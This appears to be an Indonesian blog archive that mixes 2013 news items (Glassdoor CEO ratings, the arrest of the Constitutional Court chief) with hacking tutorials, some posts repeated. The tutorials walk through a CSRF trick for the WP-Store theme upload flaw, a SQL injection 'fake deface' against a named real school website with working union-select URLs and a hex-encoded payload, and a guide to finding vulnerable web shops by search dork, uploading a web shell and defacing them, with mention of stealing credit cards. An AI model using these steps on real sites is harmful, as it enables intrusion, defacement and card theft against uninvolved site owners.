Friday, October 25, 2013

News,............. Seorang Mark Zuckerberg Menjadi CEO Perusahaan Amerika Paling Populer

i antara sekian banyak CEO perusahaan besar Amerika, nama Mark Zuckerberg ternyata menjadi yang paling populer. Hal tersebut pun diungkapkan oleh situs dunia kerja bernama Glassdoor.com.
Mereka pun merilis beberapa nama CEO yang memiliki hubungan baik dengan para karyawannya. Di antara sekian banyak CEO perusahaan di Amerika, Mark Zuckerberg mendapatkan rating yang tertinggi, yakni sebesar 97 persen.
Di tempat kedua, juga merupakan pimpinan jejaring sosial, yakni Twitter. CEO Twitter, Dick Costolo berada di posisi kedua dengan rating sebesar 96 persen. Selanjutnya pimpinan Google, yakni Larry Page disukai oleh sekitar 95 persen para karyawan Google.
Sosok Tim Cook juga ternyata memiliki popularitas yang cukup tinggi di mata karyawan Apple. Glassdoor.com mengungkapkan bahwa sebanyak 92 persen karyawan Apple menyukai CEOnya tersebut. Sementara Jeff Bezos, pimpinan Amazon mendapatkan rating sebesar 87 persen.
i antara sekian banyak CEO perusahaan besar Amerika, nama Mark Zuckerberg ternyata menjadi yang paling populer. Hal tersebut pun diungkapkan oleh situs dunia kerja bernama Glassdoor.com.
Mereka pun merilis beberapa nama CEO yang memiliki hubungan baik dengan para karyawannya. Di antara sekian banyak CEO perusahaan di Amerika, Mark Zuckerberg mendapatkan rating yang tertinggi, yakni sebesar 97 persen.
Di tempat kedua, juga merupakan pimpinan jejaring sosial, yakni Twitter. CEO Twitter, Dick Costolo berada di posisi kedua dengan rating sebesar 96 persen. Selanjutnya pimpinan Google, yakni Larry Page disukai oleh sekitar 95 persen para karyawan Google.
Sosok Tim Cook juga ternyata memiliki popularitas yang cukup tinggi di mata karyawan Apple. Glassdoor.com mengungkapkan bahwa sebanyak 92 persen karyawan Apple menyukai CEOnya tersebut. Sementara Jeff Bezos, pimpinan Amazon mendapatkan rating sebesar 87 persen.

Thursday, October 3, 2013

CSRF untuk Wordpress Theme Upload Vulnerability (WP-STORE)

Assalamu'alaikum
yang gak jawab maho >,< . Oiya jangan lupa doa'in ane biar ane dapet nilai bagus ya UKK senin 10/6/2013 nanti



Ente pernah kan lagi ngejalanin exploit wp-store eh tiba tiba pas masukin path /upload/ malah forbidden.
nah ane punya solusinya nih, yaitu dengan CSRF

Yok langsung !
Pertama, download ini > DOWNLOAD

1. Disini kita beranggapan bahwa ente sudah punya target yang forbidden
2. Edit hasil download-an tadi, ganti url yang ane tandai dengan url mu yang forbidden tadi


3. Simpan dalam ekstensi .html
4. Buka, lalu pilih file yang mau di upload. Selesai  :)

CSRF untuk Wordpress Theme Upload Vulnerability (WP-STORE)

Mr. Xenophobic Saturday, June 15, 2013
Assalamu'alaikum
yang gak jawab maho >,< . Oiya jangan lupa doa'in ane biar ane dapet nilai bagus ya UKK senin 10/6/2013 nanti



Ente pernah kan lagi ngejalanin exploit wp-store eh tiba tiba pas masukin path /upload/ malah forbidden.
nah ane punya solusinya nih, yaitu dengan CSRF

Yok langsung !
Pertama, download ini > DOWNLOAD

1. Disini kita beranggapan bahwa ente sudah punya target yang forbidden
2. Edit hasil download-an tadi, ganti url yang ane tandai dengan url mu yang forbidden tadi

3. Simpan dalam ekstensi .html
4. Buka, lalu pilih file yang mau di upload. Selesai  :)

Deface Palsu via SQL Injection

pertama,jadi yg kita lakuakn cm deface palsu...deface yg hanya bs d baca dr sisi client,seperti XSS..gmn crnya ?lnjut ..

1.Siapin target ,mau SQL versi 4 atau versi 5 jg boleh.kl lupa nihh
2.nah misalnya udah dapet target nih [http://www.sttheresia-jkt.sch.id/home.php?t=tk&i=4]
3.cek versinya... [http://www.sttheresia-jkt.sch.id/home.php?t=tk&i=-4 union select 1,@@version,3,4,5,6--]

Web Diatas Versinya 5 , Tapi Kalo Nemu Versi 4 Juga Jangan Khawatir Yee ..
drpd cape ngeblind..
yaudah buat gaya2an..
deface palsu ajaa..
kalian tw kan yg ngerubah ascii jd hex code?

nah coba buat script deface,misal <h1>Ini Hanya Untuk Demo Dari Tutorial Gua Yang Deface Palsu.. hahahahahaha<br><br><br>By BLACK32HIDDEN From BANDUNG BLACKHAT</h1>

masukin ke bagian ASCII yg ada d web dieq41..

trus kl ud d masukin..liat bagian hexadecimal,bakal muncul: 3C68313E496E692048616E796120556E74756B2044656D6F2044617269205475746F7269616C204775612059616E67204465666163652050616C73752E2E206861686168616861686168613C62723E3C62723E3C62723E427920424C41434B333248494444454E2046726F6D2042414E44554E4720424C41434B4841543C2F68313E

nah kode d atas tuh kodehasil convert dr ascii ke hex..

nah,,skrg yg kode 3C68313E496E692048616E796120556E74756B2044656D6F2044617269205475746F7269616C204775612059616E67204465666163652050616C73752E2E206861686168616861686168613C62723E3C62723E3C62723E427920424C41434B333248494444454E2046726F6D2042414E44554E4720424C41434B4841543C2F68313E ditambah 0x d depannya ...jadi 0x3C68313E496E692048616E796120556E74756B2044656D6F2044617269205475746F7269616C204775612059616E67204465666163652050616C73752E2E206861686168616861686168613C62723E3C62723E3C62723E427920424C41434B333248494444454E2046726F6D2042414E44554E4720424C41434B4841543C2F68313E

oke,coba masukin d angka 3 ,yg script hex nyaa..
http://www.sttheresia-jkt.sch.id/home.php?t=tk&i=-4 union select 1,0x3C68313E496E692048616E796120556E74756B2044656D6F2044617269205475746F7269616C204775612059616E67204465666163652050616C73752E2E206861686168616861686168613C62723E3C62723E3C62723E427920424C41434B333248494444454E2046726F6D2042414E44554E4720424C41434B4841543C2F68313E,3,4,5,6--

ew.kok ada hacked by me?hhe..itu tandanya udah berhasil sob..

makanya ak bilang ini cm client aja..ask : kl mau deface bneran?yaudah gawei dewek ..kan ad tutor sql injectionnya tuh..

ok sob smua,makasih2.

Tingkatan Defacer/Hacker

Seseorang yang mempunyai minat besar terhadap sistem komputer,  
mempelajarinya secara detail dan bagaimana meningkatkan kapabilitasnya.  
Besarnya minat yang dimiliki seorang Hacker dapat mendorongnya untuk  
memiliki kemampuan penguasaan sistem di atas rata-rata. Jadi,
Hacker sebenarnya meliputi konotasi netral.

Dalam dunia "UNDERGROUND" {beroperasi secara sembunyi-sembunyi/dalam lingkungan Internet, suatu aktivitas yang tidak terlihat identitasnya}. Orang yang menjadi Hacker biasanya melalui tahapan berikut ini :

1. Mundane Person
Inilah tahap dasar seorang Hacker. Seseorang pada ingkatan ini pada   dasarnya tidak tahu sama sekali tenang dunia hacker dan   langkah-langkahnya. Walaupun Ia memiliki komputer an akses internet. Ia   hanya tahu, bawa yang namanya Hacker itu membobol sistem komputer dan   melakukan hal-hal yang negatif ( tindak kejahatan).

2. Lamer
Seseorang pada tingkatan ini masih dibingungkan oleh seluk beluk   Hacking, sama seperti cara-cara Warez {dalam dunia Underground berarti   menggandakan perangkat lunak secara ilegal}. Sudah mencoba belajar,   tetapi pengetahuannya masih minim. Sudah bisa mengirimkan Trojan {yang   dibuat orang lain} atau pada komputer orang lain ketika melakukan   obrolan pada IRC {Internet Relay Chat} atau ICQ {berasal dari kata "I   Seek You". Aplikasi untuk Chatting dengan pertukaran file dan pengiriman   SMS} dan menghapus file-file mereka. Padahal, Ia sendiri tahu persis   bagaimana Trojan mereka. Biasanya seseorang yang sukses menjadi Hacker   bisa melalui tahapan ini dengan cepat tanpa harus melompatinya.

3. Wannabe
Tahapan yang dilalui oleh mereka yang menjadi Hacker. Pada tingkatan  ini  seseorang sudah mengetahui bahwa melakukan tindakan Hack itu lebih  dari  sekedar menerobos masuk ke komputerorang lain. Ia lebih menganggap  hal  tersebut sebagai sebuah filsafat atau way of life. Akhirnya, Ia  ingin  tahu lebih banyak lagi. Mulai mencari, membaca dan mempelajari  tentang  metode-metode hacking dari berbagai sumber.
 4. Larva
Tahapan yang dilalui oleh mereka yang menjadi Hacker. Disebut juga "NEWBIE".   Pada tekhnik ini, Ia sudah memiliki dasar-dasar tekhnik Hacking.  Dengan  mencoba menerobos masuk ke sistem orang lain hanya untuk mencoba  apa  yang telah dipelajari. Meskipun, pada tingkatan ini mengerti bahwa   ketika melakukan Hacking, tidak harus merusak sistem/menghapus apa  saja  jika hal itu tidak lagi diperlukan untuk menghilangkan jejak.
 5. Hacker
Ini adalah tingkatan tertinggi. pada tingkatan ini seorang Newbie  sudah  menguasai apa pun dan melewati tantangan apa pun dalam dunia  sistem  pertahanan dunia maya. tapi jika anda berada di posisi ini,  jadilah  hacker beraliran putih

Cara Deface Web Dengan WPStore Themes Uploader

Mr. Xenophobic Wednesday, May 15, 2013
 Kali ini kita akan melakukan aksi deface terhadap webshop (web perbelanjaan), jadi jika anda beruntung anda bisa mendapatkan CC (Credit Card).

Ok, kali ini cara yang kita gunakan yaitu mengupload shell kita dengan exploit
1. Masukkan dork ini ke kotak pencarian google inurl:/wp-content/themes/WPstore/
2. Pilih salah satu dari hasil penelusuran
3. Masukkan exploit berikut /wp-content/themes/WPStore/upload/
Contoh: www.site.com/wp-content/themes/WPStore/upload/
4. Nanti akan muncul tampilan berikut
Anda klik "pilih file" untuk mengupload shell anda.
5. Tunggu beberapa saat
6. Jika shell sudah tertanam, anda buka shell anda dengan cara membuka url'nya
Contoh: www.site.com/wp-content/uploads/products_img/shell.php
7. Anda hanya tinggal eksekusi saja, cari file index.php / index.html nya lalu rubah isinya dengan script deface anda
Semoga bermanfaat ^_^

Wednesday, October 2, 2013

MK ditangkap KPK

 SBY: Penangkapan Ketua MK Sangat MengejutkanPresiden Susilo Bambang Yudhoyono (SBY) mengaku sangat terkejut, atas tertangkapnya Ketua Mahkamah Konstitusi Akil Mochtar oleh Komisi Pemberantasan Korupsi (KPK).
Apalagi, SBY menilai MK adalah lembaga negara yang teramat penting bagi ketatanegaraan dan pemerintahan nasional.
"Saya perlu sampaikan khusus atas peristiwa ini, bahwa saya sangat terkejut dengan adanya kasus di MK ini. Apalagi yang ditangkap adalah ketuanya," kata SBY  di Istana Negara, Kamis (3/10/2013).
Namun, SBY yakin proses demokratisasi di Indonesia akan terus berjalan baik meski Ketua MK ditangkap karena kasus suap.
"Kalau sudah berbicara tentang pemilu, pemilihan kepala daerah itu berkaitan dengan suara rakyat dan itu hakikatnya demokrasi yang akan terus kita matangkan dan tingkatkan kualitasnya," jelasnya.
Sebelumnya diberitakan, Ketua MK Akil Mochtar  tertangkap tangan oleh Komisi Pemberantasan Korupsi menerima suap terkait sengketa Pilkada Kabupaten Gunung Mas senilai Rp 3 miliar.
Saat ditangkap, Akil bersama anggota DPR RI Chairun Nisa dan pengusaha berinisial CN di rumah Akil, Komplek Widya Chandra III Nomor 7, Jakarta Selatan. Di tempat terpisah, KPK menangkap Bupati Gunung Mas Hambit Bintih yang menjadi calon petahana pada Pilkada Gunung Mas. Ditangkap juga bersama Hambit seseorang berinisial DH.

Disisi lain kita masih mengingat Moment 
Presiden SBY Lantik Hakim Mahkamah Konstitusi
Pelantikan Hakim Konstitusi di Istana Negara.

Presiden Susilo Bambang Yudhoyono melantik Hakim Konstitusi Akil Mochtar, Patrialis Akbar, dan Maria Farida Indrati di Istana Negara, Jakarta, Selasa 13 Mei 2013. Akil dilantik menjadi Ketua Mahkamah Konstitusi menggantikan Mahfud MD, Patrialis dilantik menggantikan Achmad Sodiki yang jabatannya berakhir pada Agustus 2013, dan Maria dilantik untuk periode keduanya sebagai Hakim Konstitusi.
Akil adalah Hakim Konstitusi yang terpilih dari jalur DPR, sedangkan Patrialis dari jalur pemerintah yang ditunjuk berdasarkan hak prerogatif Presiden. Lihat pelantikan mereka di tautan foto-foto ini. Akil terpilih menjadi Hakim Konstitusi sejak tahun 2008. Masa jabatan periode pertamanya berakhir pada 16 Agustus 2013, namun dapat diperpanjang ke periode kedua hingga tahun 2018. DPR pun memutuskan untuk memperpanjang jabatan mantan politisi Golkar itu.
Sementara Maria Farida yang masa jabatannya berakhir pada 19 Agustus 2013 ditunjuk kembali oleh Presiden SBY untuk menjadi Hakim Konstitusi.
Terakhir, Patrialis Akbar yang dilantik menggantikan Achmad Sodiki yang memasuki masa pensiun, merupakan mantan politisi Partai Amanat Nasional, mantan anggota Komisi Hukum DPR, dan mantan Menteri Hukum dan HAM.